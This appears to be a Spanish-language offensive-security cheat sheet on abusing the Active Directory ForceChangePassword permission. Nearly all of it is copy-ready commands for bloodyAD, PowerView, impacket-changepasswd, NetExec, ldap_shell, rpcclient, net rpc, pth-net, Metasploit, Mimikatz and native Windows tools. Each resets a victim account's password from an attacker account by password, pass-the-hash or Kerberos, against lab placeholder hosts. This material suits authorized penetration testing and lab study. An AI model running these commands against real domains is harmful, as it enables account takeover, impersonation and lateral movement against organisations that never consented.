ForceChangePassword

Introduction

En este post, exploramos el abuso de ForceChangePassword Active Directory a través de la explotación de Listas de Control de Acceso Discrecional (DACL) utilizando el permiso ForcePasswordChange en entornos Active Directory. Este permiso es especialmente peligroso para cuentas privilegiadas, ya que permite el movimiento lateral y el acceso no autorizado a través de sistemas suplantando la identidad de la cuenta comprometida. Por lo tanto, entender cómo funciona esta vulnerabilidad es crucial para los profesionales de la seguridad.

---

From Linux

bloodyAD

User/Password

bloodyAD --host 10.10.10.10 -d domain.htb -u 'attacker' -p 'password' set password 'victim' 'NewPassword01!'

Pass-the-Hash (PtH)

bloodyAD --host 10.10.10.10 -d domain.htb -u 'attacker' -p ':01e97f85894e06a5ad698f624b9a7ee9' set password 'victim' 'NewPassword01!'

Kerberos

bloodyAD --host dc.domain.htb -d domain.htb -k set password 'victim' 'NewPassword01!'

GitHub - CravateRouge/bloodyAD: BloodyAD is an Active Directory Privilege Escalation FrameworkGitHub

Proof of Concept (PoC)

ForceChangePassword

---

PowerView.py

Authentication on PowerView.py

User/Password

powerview domain.htb/attacker:'Password01!'@10.10.10.10 --dc-ip 10.10.10.10

Pass-the-Hash (PtH)

powerview domain.htb/attacker@10.10.10.10 -H '01e97f85894e06a5ad698f624b9a7ee9' --dc-ip 10.10.10

Kerberos

powerview domain.htb/attacker@dc.domain.htb -k --no-pass --dc-ip 10.10.10.10

Command to use

Set-DomainUserPassword -Identity 'victim' -AccountPassword 'NewPassword12'

GitHub - aniqfakhrul/powerview.py: Just another Powerview alternative but on steroidsGitHub

Proof of Concept (PoC)

ForceChangePassword

---

Impacket-changepasswd

User/Password

impacket-changepasswd domain.htb/victim@10.10.10.10 -newpass 'NewPass01!' -reset -altuser 'attacker' -altpass 'Password01!' -dc-ip 10.10.10.10

Pass-the-Hash (PtH)

impacket-changepasswd domain.htb/victim@10.10.10.10 -newpass 'NewPass01!' -reset -altuser 'attacker' -althash '01e97f85894e06a5ad698f624b9a7ee9' -dc-ip 10.10.10.10

Kerberos

impacket-changepasswd domain.htb/victim@dc.domain.htb -newpass 'NewPass01!' -reset -altuser 'attacker' -k -no-pass -dc-ip 10.10.10.10

---

NetExec

Change Password of a different User

Podemos modificar la contraseña de otro usuario el cual tengamos los permisos suficientes (GenericAll o ForceChangePassword) a través de (NEWPASS) o modificar su hash NTLM (NEWNTHASH).

User/Password

Modificar contraseña de otro usuario.

User/Password

nxc smb 10.10.10.10 -u 'attacker' -p 'Password01!' -M change-password -o USER=victim NEWPASS='NewPass123!'

Modificar hash NTLM de otro usuario.

User/Password

nxc smb 10.10.10.10 -u 'attacker' -p 'Password01!' -M change-password -o USER=victim NEWNTHASH='01e97f85894e06a5ad698f624b9a7ee9'

Pass-the-Hash (PtH)

Kerberos

---

ldap_shell

Deberemos acceder a la interfaz interactiva de ldap_shell, para ello deberemos autenticarnos a través de alguno de los siguientes métodos. Posteriormente al acceder a la terminal de ldap_shell, ejecutaremos el comando correspondiente para modificar la contraseña del usuario.

Authentication on ldap_shell

User/Password

ldap_shell domain.htb/attacker:'Password01!' -dc-ip 10.10.10.10

Si no conocemos el LM Hash, tenemos que indicar (aad3b435b51404eeaad3b435b51404ee) y posteriormente el hash NTLM. Formato --> LMHASH:NTHASH

Pass-the-Hash (PtH)

ldap_shell domain.htb/attacker -hashes 'aad3b435b51404eeaad3b435b51404ee:01e97f85894e06a5ad698f624b9a7ee9' -dc-ip 10.10.10.10

Kerberos

ldap_shell domain.htb/attacker -k -no-pass -dc-host dc.domain.htb -dc-ip 10.10.10.10

Command to use

change_password victim 'NewPass123!'

GitHub - PShlyundin/ldap_shell: AD ACL abuseGitHub

Proof of Concept (PoC)

ForceChangePassword

---

rpcclient

User/Password

rpcclient -U 'attacker%Password01!' 10.10.10.10 -c 'setuserinfo victim 23 NewPass123!'

Pass-the-Hash (PtH)

rpcclient -U 'attacker%01e97f85894e06a5ad698f624b9a7ee9' --pw-nt-hash 10.10.10.10 -c 'setuserinfo victim 23 NewPass123!'

---

net rpc

User/Password

net rpc password 'victim' 'NewPass01!' -U domain.htb/attacker%'Password01!' -S 10.10.10.10

Pass-the-Hash (PtH)

net rpc password 'victim' 'NewPass01!' -U domain.htb/attacker%'01e97f85894e06a5ad698f624b9a7ee9' --pw-nt-hash -S 10.10.10.10

---

pth-net

User/Password

pth-net rpc password 'victim' 'NewPass123!' -U 'domain.htb/attacker%Password01!' -S 10.10.10.10

Pass-the-Hash (PtH)

pth-net rpc password 'victim' 'NewPass123!' -U 'domain.htb/attacker%afac881b79a524c8e99d2b34f438058b' --pw-nt-hash -S 10.10.10.10

---

Metasploit

Accedemos a Metasploit a través de (msfconsole -q) y ejecutamos los siguientes comandos. Desde nuestro usuario attacker que dispone del ACL ForceChangePassword sobre el usuario victim, realizaremos el cambio de contraseña.

use auxiliary/admin/ldap/change_password
set rhosts 10.10.10.10
set domain domain.htb
set username attacker
set password Password01!
set target_user victim
set new_password NewPass123!
run

Proof of Concept (PoC)

ForceChangePassword

---

From Windows

bloodyAD.exe

User/Password

.\bloodyAD.exe --host 10.10.10.10 -d domain.htb -u 'attacker' -p 'password' set password 'victim' 'NewPassword01!'

Pass-the-Hash (PtH)

.\bloodyAD.exe --host 10.10.10.10 -d domain.htb -u 'attacker' -p ':01e97f85894e06a5ad698f624b9a7ee9' set password 'victim' 'NewPassword01!'

Kerberos

.\bloodyAD.exe --host dc.domain.htb -d domain.htb -k set password 'victim' 'NewPassword01!'

---

PowerView.ps1

powershell -ep bypass

Import-Module .\PowerView.ps1

$user = 'DOMAIN\attacker'; 
$pass= ConvertTo-SecureString 'AttackerPwd' -AsPlainText -Force; 
$creds = New-Object System.Management.Automation.PSCredential $user, $pass;
$newpass = ConvertTo-SecureString 'NewPass123!' -AsPlainText -Force; 
Set-DomainUserPassword -Identity 'DOMAIN\victim' -AccountPassword $newpass -Credential $creds;

PowerSploit/Recon/PowerView.ps1 at master · PowerShellMafia/PowerSploitGitHub

---

Mimikatz

lsadump::setntlm /server:domain.htb /user:victim/password:NewPass123!

---

Windows Native

CMD

net user victim NewPass123! /domain

PowerShell

Import-Module ActiveDirectory

Set-ADAccountPassword -Identity victim -NewPassword (ConvertTo-SecureString 'NewPass12!' -AsPlainText -Force) -Reset

---

References

Abusing AD-DACL: ForceChangePasswordHacking Articles

Active Directory - Access Controls ACL/ACE - Internal All The Thingsswisskyrepo.github.io

ForceChangePassword | The Hacker Recipeswww.thehacker.recipes

ForceChangePassword - SpecterOpsSpecterOps

Abusing Active Directory ACLs/ACEs | Red Team Noteswww.ired.team